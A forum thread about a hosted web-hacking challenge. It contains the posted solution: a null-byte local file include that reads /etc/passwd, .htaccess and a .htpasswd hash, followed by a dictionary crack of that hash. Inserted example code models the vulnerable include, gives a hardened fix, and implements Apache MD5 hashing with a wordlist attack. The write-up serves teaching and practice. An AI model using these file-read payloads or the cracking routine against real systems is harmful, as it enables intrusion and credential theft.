Security Challenge

Comments

  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    You could probably do that at the router, if you were happy for that machine not to see the rest of the network. Unless you have more than one adapter, where you could then just lock down the adapter the VM is using.

    Of course, depends on your configuration.

    I might (no promises :P) develop a quick challenge that satisfies your 4 points, if you are willing to host it?

    Plus don't want anyone accessing my router admin/configs :-)


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    Perhaps a bit of SQLi for the next challenge. Just a basic db driven auth system with an admin account - username, md5 encrypted password. Gain admin will allow you to add your name to the wall of fame. If you need any help with code just let me know.

    Later on you could try add some simple filtering, that would require filter evasion to complete the same attack.

    Maybe a load_file() vuln at a later date.

    Lots of ideas I have. I would have coded them before, but I just don't have DB access on my shell, and limited disk space.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    dlofnep wrote: »
    Perhaps a bit of SQLi for the next challenge. Just a basic db driven auth system with an admin account - username, md5 encrypted password. Gain admin will allow you to add your name to the wall of fame. If you need any help with code just let me know.

    Later on you could try add some simple filtering, that would require filter evasion to complete the same attack.

    Maybe a load_file() vuln at a later date.

    Lots of ideas I have. I would have coded them before, but I just don't have DB access on my shell, and limited disk space.

    Funny you mentioned that, as I was thinking about something similar to above with some other twists. It's a bit of a pain hosting it on my laptop though.


  • Registered Users, Registered Users 2 Posts: 1,311 ✭✭✭Procasinator


    dlofnep wrote: »
    Perhaps a bit of SQLi for the next challenge. Just a basic db driven auth system with an admin account - username, md5 encrypted password. Gain admin will allow you to add your name to the wall of fame. If you need any help with code just let me know.

    Later on you could try add some simple filtering, that would require filter evasion to complete the same attack.

    Maybe a load_file() vuln at a later date.

    Lots of ideas I have. I would have coded them before, but I just don't have DB access on my shell, and limited disk space.
    Funny you mentioned that, as I was thinking about something similar to above with some other twists. It's a bit of a pain hosting it on my laptop though.

    Haha, I was gonna do the same.

    Was gonna use SQLite, so should be able to go with most PHP5 installations maintenance free.

    Saying that, we're kinda giving away the solutions to potential challenges. :P


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    This challenge is going off-line tomorrow evening, just so you are aware in case you want to try this challenge.


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    Thanks for being a gracious host :) If you need any help with coding for the next one, drop me a line.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    dlofnep wrote: »
    Thanks for being a gracious host :) If you need any help with coding for the next one, drop me a line.

    Will do, cheers.


  • Closed Accounts Posts: 14 Sigtran


    thanks for this one. looking forward to the next challenge :)


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Ok this challenge is over and the solution is posted below. I will leave the server up for a few hours if anyone wants to run through the solution. I have also attached the webserver files so you can take a look through if you want to host a similar challenge.


    Hall Of Fame:
    dregin
    Pygmalion
    dlofnep
    Livewire
    lithiumoxide
    CheeseCake Monster
    Procasinator
    nemo
    isaac702
    Robert Tables
    trout
    fcerullo
    d_fens
    rockethamster
    fLa
    Muelli
    Sigtran
    Ack Attack
    


    SOLUTION:

    Your aim is to get your name on the hall of fame.

    Let's see what web server the host is running. Let's read an HTTP header from the web server. There are several ways to do this; there are hundreds of tools, one being nmap. There are also browser plug-ins, e.g. https://addons.mozilla.org/sl/firefox/addon/live-http-headers/, but if you want an even quicker solution, just use: http://web-sniffer.net/


    As you can see we are running:
    Status: HTTP/1.1 200 OK
    Date: Fri, 11 Feb 2011 09:16:26 GMT
    Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
    X-Powered-By: PHP/5.2.6-1+lenny9
    Vary: Accept-Encoding
    Content-Encoding: gzip
    Content-Length: 815
    Connection: close
    Content-Type: text/html


    Apache and PHP are very up to date versions. So let's ignore looking for a known exploit for now. Take a look around the site to see what we find. The [admin] link should catch your eye very quickly. You can see this is a hyperlink to the "admin/" directory. Clicking on it, you can see that it asks for a username/password. It asks for it in a dialog form, and not an HTML/PHP interface.

    The first thing I would Google is: Apache directory password. First result is: Authentication, Authorization and Access Control - Apache HTTP Server - http://httpd.apache.org/docs/2.0/howto/auth.html

    Reading through this article you can conclude that the directory auth configuration will either go in the main httpd.conf or in a .htaccess file inside the protected directory. This will then contain a link to a .htpasswd file that should not be readable by the web-server.

    So thinking we need to read that .htaccess file would be a good guess. Everyone will at first try damo.dyndns.info/admin/.htaccess, however first, you need to have a successful login to read the contents of admin/, and second, Apache by default is configured to ignore requests for files named .ht*. So we need to find another way to read this file. Take a look at the source code of the main page. You will see links like: index.php?page=about , index.php?page=main .

    Maybe "about" and "main" are actual files on the server? Let's try damo.dyndns.info/about. Damn, 404. Let's try damo.dyndns.info/about.php ... success! It looks like the page argument to index.php is taking in file names to read. Maybe the web developer hasn't properly sanitized input? Let's try an LFI attack (Local File Include). damo.dyndns.info/index.php?page=/etc/passwd Damn, were you feeling lucky? Take a closer look at the error message: "Failed opening '/etc/passwd.php' for inclusion".

    Hmm, we didn't put on a ".php"? Maybe index.php is automatically doing this? Maybe we can use some operators or characters to fool the PHP script into ignoring the '.php' appended. A quick Google of "LFI terminate string" and you will come across http://www.scribd.com/doc/35882618/lfi-paper which describes this exact scenario and how to get around it. We can terminate the string with a null byte (0x00). In an HTTP request we can represent this byte as %00, so let's try that. damo.dyndns.info/index.php?page=/etc/passwd%00 and SUCCESS.

    Note: since PHP3/4 a feature called "magic quotes" is enabled by default (it was disabled for this challenge) which would result in the byte above being escaped, e.g. \0, therefore this approach wouldn't work. You can still bypass magic quotes when it comes to SQL injection however. It also must be stated that a lot of web servers have magic quotes disabled due to it causing problems with many 3rd party PHP web apps available for public use, and even PHP apps local to the server in question. More information about this here: http://en.wikipedia.org/wiki/Magic_quotes#Criticism

    Now lets get that .htaccess file. damo.dyndns.info/index.php?page=admin/.htaccess%00 This gives us:
    AuthType Basic
    AuthName "Restricted Access!"
    AuthUserFile /home/challenge/.htpasswd
    Require user moderator
    

    Now we know that the username is "moderator" and the hidden location of the .htpasswd file. Read that too! damo.dyndns.info/index.php?page=/home/challenge/.htpasswd%00 gives us: moderator:$apr1$rr7qqTbV$CZIdIGOVUAcVDMUrWEm8a/

    Let's look here to see what this is: http://httpd.apache.org/docs/2.2/misc/password_encryptions.html "Apache-specific algorithm using an iterated (1,000 times) MD5 digest". Hmm, if you already ran John the Ripper against this, you may have seen "no hash loaded" or similar. Quickly Googling around, you see that there are patches for John the Ripper to support this "Apache MD5". Hint: the "jumbo" version of John the Ripper includes many patches for lots of different hashes. http://openwall.info/wiki/john/custom-builds to get a copy.

    Also, a rule of thumb is to run a dictionary attack before you resort to brute forcing; you may get lucky, and it will save you a hell of a lot of time if you do. I would recommend a large dictionary/wordlist compared to the default one included with JtR, e.g. http://zip-password-cracker.com/files/english.zip...

    So try a dictionary attack against your acquired .htpasswd file using your large wordlist, and if you're lucky, you will have a login for damo.dyndns.info/admin/ :-)

    That is all!
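    The include bug and the null-byte trick from the solution above, as an added example that is not part of the original post or the challenge's own index.php: a Python model of the vulnerable resolver (attacker-controlled path, ".php" appended, NUL truncation) beside an allow-listed replacement. The NUL truncation is emulated: PHP before 5.3.4 handed the include path to the C runtime, which treats 0x00 as end-of-string, while Python's own open() refuses embedded NULs, so this code only computes the path that would have been opened and reads nothing from disk. The PAGES allow-list, the function names and the "webroot" directory are assumptions made for the example.

```python
"""Vulnerable page-include resolver versus an allow-listed one.

Added example, not the challenge's own PHP. The NUL truncation is
emulated: PHP < 5.3.4 passed the include path to the C library, which
stops at the first 0x00, so "/etc/passwd\x00.php" opened /etc/passwd.
Nothing here touches the filesystem; only the path is computed.
"""
import os
from urllib.parse import unquote


def vulnerable_resolve(page_param):
    """Models  include($_GET['page'] . '.php')  with magic_quotes_gpc off."""
    # The server URL-decodes the query string: "%00" becomes "\x00".
    raw = unquote(page_param) + ".php"
    # C-string semantics: whatever follows the first NUL byte is ignored.
    return raw.split("\x00", 1)[0]


# Assumed allow-list for the hardened version: the only pages the site has.
PAGES = {"main": "main.php", "about": "about.php"}


def hardened_resolve(page_param, webroot):
    """Return the file to include, or None if the request is not allowed.

    Two independent controls: the request must name a known page (so no
    user input ever becomes a path), and the resolved file must still lie
    inside webroot (defence in depth against a bad PAGES entry or symlink).
    """
    page = unquote(page_param)
    if "\x00" in page:
        return None
    filename = PAGES.get(page)
    if filename is None:
        return None
    root = os.path.realpath(webroot)
    target = os.path.realpath(os.path.join(root, filename))
    if os.path.commonpath([root, target]) != root:
        return None
    return target


if __name__ == "__main__":
    for p in ("main", "/etc/passwd", "/etc/passwd%00", "admin/.htaccess%00"):
        print("%-22s vulnerable -> %-20s hardened -> %s"
              % (p, vulnerable_resolve(p), hardened_resolve(p, "webroot")))
```

    The allow-list is the real fix; the realpath containment check costs one line and catches the case where a later change lets user input influence the mapped filename. Upgrading PHP past 5.3.4 only closes the null-byte variant, not the underlying arbitrary include.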

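    The last step of the solution, cracking the `$apr1$` entry recovered from .htpasswd with a wordlist, as an added example that is not part of the original post: a pure-Python implementation of the Apache MD5 scheme (the "iterated (1,000 times) MD5 digest" the Apache page describes, and what the John the Ripper jumbo patches add support for) plus the dictionary attack run over it. The salt, password and wordlist below are constructed for the example and are not the challenge's; parse_htpasswd_line and dictionary_attack are names chosen here.

```python
"""Apache $apr1$ (MD5-based crypt) and a wordlist attack against .htpasswd.

Added example, not from the original post. apr1_crypt follows the
apr_md5_encode() algorithm: a seed digest over password/magic/salt, a
1000-round loop that alternates password, salt and the running digest,
and a custom base-64 encoding of the 16 result bytes. The same code
with magic "$1$" yields the classic md5crypt used in /etc/shadow.
"""
import hashlib

_ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value, count):
    """Encode the low 6*count bits of value, least-significant group first."""
    out = []
    for _ in range(count):
        out.append(_ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def apr1_crypt(password, salt, magic="$apr1$"):
    pw = password.encode("utf-8")
    salt = salt.split("$", 1)[0][:8]          # htpasswd salts are at most 8 chars
    sb, mb = salt.encode("ascii"), magic.encode("ascii")

    ctx = hashlib.md5(pw + mb + sb)
    alt = hashlib.md5(pw + sb + pw).digest()
    for i in range(len(pw)):                   # alt repeated to password length
        ctx.update(alt[i % 16:i % 16 + 1])
    i = len(pw)
    while i:                                   # bit-walk over the password length
        ctx.update(b"\x00" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()

    for i in range(1000):                      # the 1,000-times iterated MD5
        c = hashlib.md5()
        c.update(pw if i & 1 else final)
        if i % 3:
            c.update(sb)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()

    order = ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))
    encoded = "".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
                      for a, b, c in order)
    encoded += _to64(final[11], 2)
    return magic + salt + "$" + encoded


def parse_htpasswd_line(line):
    """'user:$apr1$salt$hash' -> (user, salt, full_hash). Only $apr1$ entries."""
    user, sep, hashed = line.strip().partition(":")
    parts = hashed.split("$")
    if not sep or len(parts) != 4 or parts[0] != "" or parts[1] != "apr1":
        raise ValueError("not an Apache $apr1$ entry: %r" % line)
    return user, parts[2], hashed


def dictionary_attack(htpasswd_line, wordlist):
    """Hash each candidate under the entry's salt; (user, password) or (user, None)."""
    user, salt, target = parse_htpasswd_line(htpasswd_line)
    for word in wordlist:
        word = word.rstrip("\r\n")
        if word and apr1_crypt(word, salt) == target:
            return user, word
    return user, None


# Constructed sample: this is NOT the challenge's hash, salt or password.
SAMPLE_SALT = "Zx9kQ2bL"
SAMPLE_LINE = "moderator:" + apr1_crypt("letmein", SAMPLE_SALT)
SAMPLE_WORDLIST = ["password", "123456", "letmein", "qwerty"]

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print(dictionary_attack(SAMPLE_LINE, SAMPLE_WORDLIST))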

  • Registered Users, Registered Users 2 Posts: 32 tdr


    Great stuff, only got to the http://damo.dyndns.info/index.php?page=/etc/passwd%00 part.
    Still great fun,
    Thanks Damo2k


  • Closed Accounts Posts: 465 ✭✭pacquiao


    Finding the correct word list took me 2 days.
    Nice challenge, can't wait to see what you got lined up for the next one.
    Thanks


  • Closed Accounts Posts: 39 Testament


    "Problem loading page" - is dat box still alive ? Thanks.


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    No the challenge is over. I have another one running in a new thread.


  • Closed Accounts Posts: 39 Testament


    dlofnep wrote: »
    No the challenge is over. I have another one running in a new thread.

    How would you call this method of hacking ?


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    huh?


  • Closed Accounts Posts: 39 Testament


    nevermind


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    Sorry I didn't understand what you meant? What's involved? It's a web-hacking challenge. The link is here: http://www.boards.ie/vbulletin/showthread.php?t=2056219529


  • Closed Accounts Posts: 39 Testament


    The most widely used methods of website hacking include SQL injection. Do u get me now?


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    Yes, SQLi is involved.


  • Closed Accounts Posts: 39 Testament


    dlofnep wrote: »
    Yes, SQLi is involved.


    Have some fun :pac: http://www.try2hack.nl

